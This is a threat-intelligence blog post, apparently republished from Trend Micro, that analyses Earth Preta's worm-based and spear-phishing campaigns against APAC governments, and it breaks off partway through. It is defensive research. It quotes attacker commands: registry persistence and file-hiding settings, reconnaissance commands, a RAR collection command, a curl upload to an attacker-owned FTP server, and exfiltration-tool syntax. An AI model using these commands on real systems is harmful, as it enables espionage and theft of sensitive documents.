{"id":57056,"date":"2024-09-09T00:00:00","date_gmt":"2024-09-09T00:00:00","guid":{"rendered":"urn:uuid:2c898e8e-392f-f12f-cd3a-b5bda1c7fe45"},"modified":"2024-09-09T00:00:00","modified_gmt":"2024-09-09T00:00:00","slug":"earth-preta-evolves-its-attacks-with-new-malware-and-strategies","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/","title":{"rendered":"Earth Preta Evolves its Attacks with New Malware and Strategies"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"malware,articles, news, reports,research\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2024-09-09\"> <meta property=\"article:tag\" content=\"malware\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-preta-new-malware-and-strategies.html\"> <title>Earth Preta Evolves its Attacks with New Malware and Strategies | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-preta-new-malware-and-strategies.html\"><br \/>\n<meta property=\"og:title\" content=\"Earth Preta Evolves its Attacks with New Malware and Strategies\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/EarthPretaNewMalwareStrategies-Header.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Earth Preta Evolves its Attacks with New Malware and Strategies\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/EarthPretaNewMalwareStrategies-Header.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.592276781339\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layers *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1056726129\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.265508684864\">\n<div class=\"article-details\" role=\"heading\" readability=\"40.084367245658\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">In this blog entry, we discuss our analysis of Earth Preta\u2019s enhancements in their attacks by introducing new tools, malware variants and strategies to their worm-based attacks and their time-sensitive spear-phishing campaign. <\/p>\n<p class=\"article-details__author-by\">By: Lenart Bermejo, Sunny Lu, Ted Lee <time class=\"article-details__date\">September 09, 2024<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\"> <!--Add This--> <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p> <!--Add to Folio--> <!--Subscribe--> <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"38.116\">\n<div readability=\"22.478666666667\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">Earth Preta has upgraded its attacks, which now include the propagation of PUBLOAD via a variant of the worm HIUPAN.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Additional tools, such as FDMTP and PTSOCKET, were used to extend Earth Preta\u2019s control and data exfiltration capabilities.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Another campaign involved spear-phishing emails with multi-stage downloaders like DOWNBAIT and PULLBAIT, leading to further malware deployments.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Earth Preta\u2019s attacks are highly targeted and time-sensitive, often involving rapid deployment and data exfiltration, with a focus on specific countries and sectors within the APAC region.<\/span><\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\" target=\"_blank\" rel=\"noopener\">Earth Preta<\/a> has been known to launch campaigns against valued targets in <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/b\/earth-preta-campaign-targets-asia-doplugs.html\" target=\"_blank\" rel=\"noopener\">the Asia-Pacific (APAC)<\/a>. Our recent observations on their attacks against various government entities in the region show that the threat group has updated their malware and strategies.<\/p>\n<h4>Worm-based Attack Progression<\/h4>\n<p>Earth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets&#8217; networks via removable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various tasks, including the execution of tools such as RAR for collection and curl for data exfiltration.<\/p>\n<p>PUBLOAD was also used to introduce supplemental tools into the targets&#8217; environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option. A short attack overview can be seen in Figure 1.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"67b591\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig01.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig01.png\" alt=\"Figure 1. Attack chain\"> <\/a> <\/p>\n<p><figcaption>Figure 1. Attack chain<\/figcaption><\/p>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"33.017341040462\">\n<div readability=\"12.624277456647\">\n<h4><i>Initial Access and Propagation<\/i><\/h4>\n<p>It was established that PUBLOAD is among the first-stage control tools deployed by Earth Preta.&nbsp; While spear-phishing emails were previously used to deliver <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/k\/earth-preta-spear-phishing-governments-worldwide.html\" target=\"_blank\" rel=\"noopener\">PUBLOAD<\/a>, it has been recently observed that a version of PUBLOAD is delivered via a variant of HIUPAN propagating through removable drives (Figure 2). This HIUPAN variant has differences with the previously documented variant, which was used to propagate <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/c\/earth-preta-updated-stealthy-strategies.html\" target=\"_blank\" rel=\"noopener\">ACNSHELL<\/a>, although its main utility within the attack chain stays the same.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"84c67b\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig02.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig02.png\" alt=\"Figure 2. Overview of HIUPAN\"> <\/a> <\/p>\n<p><figcaption>Figure 2. Overview of HIUPAN<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>This variant is easier to configure, as it has an external config file that has basic information for its propagation and watchdog function (Figure 3).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"551239\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig03.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig03.png\" alt=\"Figure 3. HIUPAN configuration \"> <\/a> <\/p>\n<p><figcaption>Figure 3. HIUPAN configuration <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"48.5\">\n<div class=\"responsive-table-wrap\" readability=\"42\">\n<p>HIUPAN\u2019s configuration has two main components: one decimal value and the rest being a list of filenames that HIUPAN will spread with it when it propagates (Table 1). The decimal value serves as the watcher function\u2019s sleep multiplier (decimal value * 0x3e8 = sleep time) and determines the sleep timer before the watcher function performs its check again.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"4\">\n<tr>\n<td width=\"207\" valign=\"top\"><b>Type<\/b><\/td>\n<td width=\"207\" valign=\"top\"><b>Value<\/b><\/td>\n<td width=\"207\" valign=\"top\"><b>Purpose<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"207\" valign=\"top\">Decimal Value<\/td>\n<td width=\"207\" valign=\"top\">10<\/td>\n<td width=\"207\" valign=\"top\">Watcher sleep multiplier<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"207\" rowspan=\"6\" valign=\"top\">Filenames<\/td>\n<td width=\"207\" valign=\"top\">UsbConfig.exe<\/td>\n<td width=\"207\" valign=\"top\">HIUPAN Host for dll side-loading<\/td>\n<\/tr>\n<tr>\n<td width=\"207\" valign=\"top\">u2ec.dll<\/td>\n<td width=\"207\" valign=\"top\">HIUPAN malware<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"207\" valign=\"top\">WCBrowserWatcher.exe<\/td>\n<td width=\"207\" valign=\"top\">PUBLOAD Host for dll side-loading<\/td>\n<\/tr>\n<tr>\n<td width=\"207\" valign=\"top\">coccocpdate.dll<\/td>\n<td width=\"207\" valign=\"top\">PUBLOAD loader<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"207\" valign=\"top\">CocBox.zip<\/td>\n<td width=\"207\" valign=\"top\">PUBLOAD encrypted component<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"207\" valign=\"top\">$.ini<\/td>\n<td width=\"207\" valign=\"top\">HIUPAN configuration file<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center><\/p>\n<p><span class=\"rte-icon-component-text\">Table 1. Example of HIUPAN configuration values<\/span><\/p>\n<h4>&nbsp;<\/h4>\n<h5><b>HIUPAN Installation<\/b><\/h5>\n<p>HIUPAN will install its copy and copies of files that are listed in its configuration file (in this case, a PUBLOAD installation set) to <i>C:\\ProgramData\\Intel\\_\\<\/i>. It will also create an autorun registry for its installed copy:<\/p>\n<p><b>[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]<\/b><\/p>\n<p><b>UsbConfig = C:\\ProgramData\\Intel\\_\\UsbConfig.exe<\/b><\/p>\n<p>HIUPAN will also modify the values of the following registry entries to hide it and its accompanying malware\u2019s presence. These values will also be checked every time HIUPAN executes:<\/p>\n<p><b>[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]<\/b><\/p>\n<p><b>ShowSuperHidden = 0<\/b><\/p>\n<p><b>Hidden = 2<\/b><\/p>\n<p><b>HideFileExt = 1<\/b><\/p>\n<h5><b>Watcher Function and Propagation<\/b><\/h5>\n<p>Once launched from its install directory, HIUPAN will launch its watcher function, which will periodically check if there are removable and hot-pluggable drives plugged into the infected machine (Figure 4). If one is available, it will propagate to the removable drive by storing its copy, copies of files listed in its configuration, and its configuration file to a storage directory named <i>&lt;removable drive&gt;:\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\<\/i><b> <\/b>(Figure 5)<b>.<\/b><\/p>\n<p>HIUPAN will also add another copy of its host file (USBConfig.exe) and main worm component (u2ec.dll) into the root directory of the removable drive (Figure 5). It will then move all files and directories to <b>&lt;removable drive&gt;:\\_\\ <\/b>to let USBconfig.exe remain the only visible file when an unsuspecting user plugs in and opens the removable drive, baiting them into clicking it an unknowingly spreading the worm into a new environment.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"1df92e\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig04.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig04.png\" alt=\"Figure 4. Creates a list of qualified drives for propagation \"> <\/a> <\/p>\n<p><figcaption>Figure 4. Creates a list of qualified drives for propagation <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"c56bd8\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig05.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig05.png\" alt=\"Figure 5. HIUPAN spreading to removable drives\"> <\/a> <\/p>\n<p><figcaption>Figure 5. HIUPAN spreading to removable drives<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The same watcher function will also periodically check and make sure that the PUBLOAD host process is running (WCBrowserWatcher.exe) and will launch it from the install directory if it is not, as shown in Figure 6.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"9929de\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig06.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig06.png\" alt=\"Figure 6. HIUPAN watcher for PUBLOAD \"> <\/a> <\/p>\n<p><figcaption>Figure 6. HIUPAN watcher for PUBLOAD <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.446194225722\">\n<div readability=\"18.202099737533\">\n<h4><i>Network Discovery, Persistence and Control<\/i><\/h4>\n<h5><b>PUBLOAD<\/b><\/h5>\n<p>While HIUPAN facilitates propagation via removable drives, PUBLOAD has been observed to perform initial system info collection to map out the current network.<\/p>\n<p>PUBLOAD\u2019s tactics, techniques, and procedures (TTPs) remain mostly like those of the previously documented variant used in Earth Preta\u2019s <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/k\/earth-preta-spear-phishing-governments-worldwide.html\" target=\"_blank\" rel=\"noopener\">previous spear-phishing campaign<\/a> against governments. The variant propagated by HIUPAN uses <i>C:\\ProgramData\\CocCocBrowser\\<\/i> as its install path, as it uses <i>CocCocUpdate.exe<\/i> as its DLL side-loading host, a browser application popular in Vietnam. PUBLOAD has its own installation routine, which includes copying all components to its install path and creating autorun registry entry and a scheduled task (Figure 7).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"08dd47\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig07.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig07.png\" alt=\"Figure 7. PUBLOAD install command \"> <\/a> <\/p>\n<p><figcaption>Figure 7. PUBLOAD install command <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"40\">\n<div readability=\"25\">\n<p>To map the network, the following commands will be executed in sequence and in very short intervals via cmd:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">hostname<\/span><\/li>\n<li><span class=\"rte-red-bullet\">arp&nbsp; -a<\/span><\/li>\n<li><span class=\"rte-red-bullet\">whoami<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ipconfig&nbsp; \/all<\/span><\/li>\n<li><span class=\"rte-red-bullet\">netstat&nbsp; -ano<\/span><\/li>\n<li><span class=\"rte-red-bullet\">systeminfo<\/span><\/li>\n<li><span class=\"rte-red-bullet\">WMIC&nbsp; \/Node:localhost \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName \/Format:List<\/span><\/li>\n<li><span class=\"rte-red-bullet\">wmic&nbsp; startup get command,caption<\/span><\/li>\n<li><span class=\"rte-red-bullet\">curl&nbsp; http:\/\/myip.ipip.net<\/span><\/li>\n<li><span class=\"rte-red-bullet\">netsh&nbsp; wlan show interface<\/span><\/li>\n<li><span class=\"rte-red-bullet\">netsh&nbsp; wlan show networks<\/span><\/li>\n<li><span class=\"rte-red-bullet\">netsh&nbsp; wlan show profiles<\/span><\/li>\n<li><span class=\"rte-red-bullet\">wmic&nbsp; logicaldisk get caption,description,providername<\/span><\/li>\n<li><span class=\"rte-red-bullet\">tasklist<\/span><\/li>\n<li><span class=\"rte-red-bullet\">tracert&nbsp; -h 5 -4 google.com<\/span><\/li>\n<li><span class=\"rte-red-bullet\">reg&nbsp; query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/span><\/li>\n<li><span class=\"rte-red-bullet\">reg&nbsp; query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/span><\/li>\n<\/ul>\n<p>PUBLOAD also facilitates the delivery of additional tools into the compromised system. In this specific attack chain, PUPLOAD has delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some infected systems.<\/p>\n<h5><b>FDMTP<\/b><\/h5>\n<p>FDMTP is a newly found hacktool used by Earth Preta. It is a simple malware downloader implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP).<\/p>\n<p>&nbsp;In the recent campaign, threat actors embedded the FDMTP in the data section of a DLL (Figure 8).&nbsp; Then, it can be launched through DLL side-loading. To enhance malware security for defense evasion, the embedded network configurations are encoded and encrypted via Base64 and DES (Figures 9 and 10).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"6bf4b9\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig08.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig08.png\" alt=\"Figure 8. Main function of FDMTP\"> <\/a> <\/p>\n<p><figcaption>Figure 8. Main function of FDMTP<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"b07174\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig09.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig09.png\" alt=\"Figure 9. Encrypted configuration and DES key\"> <\/a> <\/p>\n<p><figcaption>Figure 9. Encrypted configuration and DES key<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"d40f13\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig10.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig10.png\" alt=\"Figure 10. Decrypted configuration\"> <\/a> <\/p>\n<p><figcaption>Figure 10. Decrypted configuration<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"45\">\n<div readability=\"35\">\n<h4><i>Collection and Exfiltration<\/i><\/h4>\n<p>Collection of data is done regularly using RAR, targeting files (.doc, .docx, .xls, .xlsx, .pdf, .ppt, .pptx) modified at specified cutoff dates. Exfiltration is performed using different methods: The most common one is using cURL to upload the archived files to an attacker-owned FTP site, with updated credentials. PUBLOAD\u2019s collection activity via RAR can be observed as follows:<\/p>\n<blockquote><p>C:\\Progra~1\\WinRAR\\Rar.exe a -r -tk -ta<b>&lt;cutoff date\/datetime&gt;<\/b> -n*.doc* -n*.docx* -n.xls* -n*.pdf* -n*.ppt* -n*.pptx* -n*.txt* C:\\programata\\IDM\\<b>&lt;machine name<\/b>&#8211;<b>&lt;root drive of target collection directories&gt;<\/b>.rar <b>&lt;start directory ir riit drive for collection&gt;<\/b><\/p><\/blockquote>\n<p>PUBLOAD also performs exfiltration via cURL, by sending the archived data to an attacker-owned FTP site:<\/p>\n<blockquote><p>curl &#8211;progress-bar -C &#8211;T C:\\programdata\\IDM\\<b>&lt;archive name&gt;<\/b>.RAR ftp:\/\/<b>&lt;ftp username&gt;<\/b>:<b>&lt;ftp password&gt;<\/b>@<b>&lt;PUBLOAD ftp server&gt;<\/b>&nbsp;&nbsp;&nbsp;&nbsp;<\/p><\/blockquote>\n<p>The first instance of collection and exfiltration commands executed by PUBLOAD is also part of its command sequence mentioned in the lateral movement section above, with time intervals less than a minute.<\/p>\n<p>An alternative method of exfiltration is by using PTSOCKET, which is a customized file transfer tool implemented based on TouchSocket over DMTP (Figure 11). According to arguments, PTSOCKET can be used to transfer files in multi-thread mode. In the recent campaign, it was used as exfiltration tool to upload the collected data onto the remote server (Figure 12).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"d69ca0\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig11.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig11.png\" alt=\"Figure 11. File transfer function of PTSOCKET\"> <\/a> <\/p>\n<p><figcaption>Figure 11. File transfer function of PTSOCKET<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b>Usage:<\/b><\/p>\n<p><i>{PTSOCKET} -h [host]:[port] -p [uploaded file path] -s [saved file path] -t [num of thread]<\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"03aa7f\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig12.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig12.png\" alt=\"Figure 12. Exfiltration via PTSOCKET \"> <\/a> <\/p>\n<p><figcaption>Figure 12. Exfiltration via PTSOCKET <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<h4>Spear-phishing Attack Progression<\/h4>\n<p>Earth Preta has initiated a fast-paced spear-phishing campaign we started to observe in June. As shown in Figure 13, this campaign made use of a spear-phishing email with an attached .url file that will download a downloader named DOWNBAIT, which will download a decoy document. Based on our telemetry, we can expect that the emails\u2019 contents are related to the decoy document. This will continue the chain of infection with PULLBAIT to load CBROVER, which will then be used to deliver PLUGX. Collection will be performed via RAR and a tool named FILESAC. Stolen information will be sent to an attacker-controlled infrastructure using a currently unknown tool. Based on our telemetry, the information may be sent to an attacker-controlled cloud service.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"967add\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig13.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig13.png\" alt=\"Figure 13. Spear-phishing attack flow\"> <\/a> <\/p>\n<p><figcaption>Figure 13. Spear-phishing attack flow<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<h4><i>Delivery<\/i><\/h4>\n<p>A spear-phishing email containing a .url attachment is sent to unsuspecting victims. This leads to the download and execution of DOWNBAIT, a signed downloader and loader tool used to download PULLBAIT, leading to the download and execution of CBROVER.<\/p>\n<h5><b>DOWNBAIT and PULLBAIT<\/b><\/h5>\n<p>DOWNBAIT is a first-stage downloader meant to download the decoy document and a downloader shellcode component. DOWNBAIT is a digitally signed tool (Figure 14); this is an attribute that can add to its evasiveness or bypass other security measures that check for digital signatures before allowing execution of applications.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"e92f4b\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig14.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" 